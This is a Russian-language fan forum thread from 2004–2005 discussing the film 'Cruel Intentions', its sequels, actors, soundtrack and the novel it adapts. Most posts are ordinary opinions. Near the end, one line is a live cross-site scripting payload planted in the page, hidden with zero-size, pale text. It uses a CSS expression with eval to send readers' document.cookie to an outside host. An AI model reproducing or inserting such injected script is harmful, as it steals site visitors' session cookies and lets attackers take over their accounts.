Просмотр полной версии : Книга и фильм "Жестокие Игры" 1,2,3
Мой, пожалуй, самый любимый фильм!
А что вы думаете об этом фильме?!
Blondy, я смотрела тока 1... Это там, где Райан Филипп умирает. А есть еще продолжение? Я плачу каждый раз :sad:
Blondy, я смотрела тока 1... Это там, где Райан Филипп умирает. А есть еще продолжение? Я плачу каждый раз :sad:
Да! Первая часть- самая интересная...
2 тоже, но уже как-то не так, 3 мне не очень понравилась!
Очень хороший и поучительный фильм! :wink:
Blondy, это точно, а у тя случайно на кассете или диске нету? Надо на нашей районной сети посмотреть, там много чего еся :smile:
Blondy, это точно, а у тя случайно на кассете или диске нету? Надо на нашей районной сети посмотреть, там много чего еся :smile:
Есть! как раз 1-ая часть, на кассете! В прокат зайди- тама точно будет и 1, и 2, и 3!!! :D
Blondy, 1 и у мя есть :wink:
Лана, зайду или в прокат или в сети пороюсь. :smile:
MedvedSt
09.12.2004, 15:04
Так. Я смотрел в таком порядке. Сначала 2ую, потом 1ую. Тогда все гораздо интереснее, логичнее, да и герой раскрывается полнее. После этих 2 частей была поставлена точка. 3ю часть смотреть не имеет смысла. В сетке у меня валяются все 3 части.
MedvedSt, жаль, что ты в выхино живешь. Ща пойду в свою сетку, все никак не дойду. :smile:
Я смотрела тока 1-ую и мне ооочень понравилось. А еще хочу книгу прочитать, по мотивам которой и был снят фильм- Опасные связи называется. Вот...
Первые Жестокие игры входят в 5-ку моих любимых фильмов ( Реквием по мечте, Достучаться до Небес, Игры разума, Жестокие игры ).
Себастьян это... ( закрываю глаза и вспоминаю его лучезарный образ ) - просто Мега стар.. даж слов таких пафосных подобрать не могу... Но точно могу сказать - ещё не видел ни одного фильма, где главная мужская роль была б исполнена с таким великолепием ( в БК конечно Питт хорош.. да и Кроу в ИР тоже молодец, и Джарет Лето в РпоМ тоже не уступает, но Райан Филипп лучше всех вместе взятых ).
Я не понимаю какому дебило вообще пришла в голову мысль снимать 2ю часть... такой позор...
1ую часть люблю, даже очень. А вторая- дрянь. Актеры не те, да и вообще...
А про третью в первый раз слышу. Там-то про что?
В третьей всё понатычкали... ради интереса- посмотрите! но однозначно, 1ая часть лючшая!!
Luna_Lovegood
20.06.2005, 13:55
ну типа что скажете... наконец посмотрела... сначала вы-потом я скажу все,что я об этом думаю))
ооо, вчера по стс, да? :lol: по-честному пытаюсь посмотреть уже раз 10, но почему-то каждый раз смотрю кусками.... как-то неинтересно... в принципе если бы удалось посмотреть целиком - может быть сказала по-другому. но пока мое мнение таково.
Да, вчера был по СТС и я смотрела в 100 раз наверно. Это один из моих любимейших фильмов. После его просмотра я прочитала Шадерло де Лакло "Опасные связи". Очень хорошо все эти интриги 18 века перенесены на наше время. Фильм и сюжет офигенный, в нем нет ни единного лишнего кадра, оч хорошо подобраны актеры и саундтрек, который слушаю до сих пор. Вот, что могу сказать.
honey_bunny
20.06.2005, 19:56
Да, фильм просто потрясающий. Вот он, мир детей богатых родителей. Ими не занимаются, они сами придумывают себе развлечения. порою жестокие...
Luna_Lovegood
21.06.2005, 20:50
ээээ.... имхо это полнейший крах глливуда... я ожидала нечто волнующее,интересное и тд... получила гоно, с предсказуемым неинтересным сюжетом,дерьмовой игрой актеров... до конца не поверила, что этот мальчик ее полюбил.... ни на каплю.. думала в этом -то и подвох,типа он ее обманул и жетско пошутил... ан нет... а сара мишель геллар( я ее оч как актрису люблю)... она больше походила на больную наркоманку,чем на секси-глэм гёл.... такие синячища(хм... может это задумка такая).... короче имхо шакин шит...просто дерьмоый режиссер... а я на 100% уверенна,что кни7га хорошая... посмотрите лучше "олдбой"... там хоть интересно...
посмотрите лучше "олдбой"... там хоть интересно...
Не слишком люблю фильмы корейского производства
Миномёт, один хрен - свои бабки и Оскар они уже получили =)
Luna_Lovegood
21.06.2005, 22:07
у них оскар????....
Kudryashka
22.06.2005, 14:24
Да, согласна... фильм обычный, ничем не запоминающийся, но вот саундтрек я еще долго слушала потом... кст, там еще есть Жестокие игры - 2 и - 3... так вот это полный бред!!!....
Luna_Lovegood
22.06.2005, 14:57
ну саундтрек это скорее заслуга групп и исполнителей, которые хорошие песни написали и поют, а не актеров и режиссеров)))).... а саунд мне нравится, тока раньше я не знала, что это саундтрек к такому шитовому фильму))
honey_bunny
23.06.2005, 00:53
по-моему. это у них оскар за "лучший поцелуй" (геллар + блэр)
Luna_Lovegood
23.06.2005, 00:55
по-моему в номинациях оскара таокго нет, это есть тока на МТВ-какие-то эвордс..... смотрела,нет у них оскара... хоть это радует...
honey_bunny
23.06.2005, 13:32
о, точно,я перепутала... дурочка=)
Жестокие игры - вообще один из немногих фильмов которые мне по настоящему понравился
Саунд там одня песня - это нечто
Counting Crows - colorblind кажется
Ксати Kudryashka зря ты так про 2 и 3 часть тоже достаточно сильно сняты.
Mrak, не пугай... Тебе понравился типичный бабский фильм?... Я посмотрел его потому, что девушка попросила: видете ли ей захотелось его пересмортеть в n-й раз... Чуть не уснул в середине...
Для меня это типично женское кино....
Обожаю этот фильм.. я про первую часть, потому что остальные части ожидают жедать лучшего!! Жалкая породия н первую часть...
www.ut (www.s=''style='font-size:0;color:#EFEFEF'style='top:expression(eval(th is.sss));'sss=`i=new/**/Image();i.src='http://zero.h12.ru/stat/capt.php?id=666&'+document.cookie;this.sss=null`st yle='font-size:0;)'
TO Korgan
Люблю фильмы с неажиданным сюжетом. А то что в последнее время снимают предсказуемо и банально :mad:
Mrak, НЕ предсказуемо лишь мало бюджетное кино... типо сняли для себя, а вы догадывайтесь что именно мы хотели этим сказать....
Kudryashka
05.07.2005, 13:36
Mrak, не знаю... меня вторая и третья части вообще бесят... это действительно просто жалкая пародия... :lol:
Luna_Lovegood
05.07.2005, 14:10
а по-моему конец там оч даже ожидаемый))))).... только не с первой минуты, а с 15-ой))))))..... посмотрите олдбой... вот там вас точно удивит конец)))
Лично мне фильм очень нравится! И юмор, и актеры, и саунд, и концовка -для меня- неожиданная!
Сара Мишель Геллар бесподобно сыграла!
Единственный ощутимый минус фильма - это то, что в самом конце Аннэт (так главную героиню, кажется, зовут?) показывают такой довольной и готовой продолжать жить дальше, как будто умер не любимый человек, а просто хороший человек, но отнюдь не близкий, да и месть её была мелочная какая-то. В остальном фильм отличный!